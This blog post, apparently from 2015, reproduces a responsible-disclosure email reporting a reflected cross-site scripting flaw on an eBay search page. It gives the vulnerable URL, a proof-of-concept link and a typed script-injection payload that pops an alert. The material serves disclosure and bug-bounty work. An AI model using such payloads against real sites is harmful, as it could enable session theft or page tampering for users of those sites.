[Vulnerability Report] Non-Persistent XSS on eBay.com

By Amit Sangra September 10, 2015


The following is my report on a serious vulnerability which i had discovered on eBay .com, for which i was also awarded a place at eBay Hall of Fame.
---Following is the email which i had sent to eBay Security Team---



Vulnerability Type: Non Persistent XSS 

Scope URL: http://cgi6.ebay.com/ws/eBayISAPI.dll-SolutionsDirectory 

Proof-of-Concept URL: http://cgi6.ebay.com/ws/eBayISAPI.dll-MfcISAPICommand=SolutionsDirectory&page=results&sort=noSort&searchText=%22]}%3B%3C%2Fscript%3E%3C%2Ftd%3E%3C%2Ftr%3E%3CBODY+ONLOAD%3Dalert%28%22XSS-By-Ak%22%29%3E%3B&Submit=Search+Directory

Vulnerability Reproduction Steps(POC): 

1. Visit the Scope URL as mentioned above. 

2. Enter the following payload in the search field: "]};; <script>alert("XSS-By-Ak" )</script>

3. After the search our URL becomes the same as POC URL which delivers the XSS alert payload "XSS-By-Ak" 

System Details: Firefox 41 on windows 8.1 

Let me know if you require any other information, i will be happy to assist. 

Regards 
Amit Kumar(Ak) 
cse@engineer.com
-------------------------------------End of eMail------------------------------------- 

Acknowledgement:

Read More
Subscribe to: Posts (Atom)

 
biz.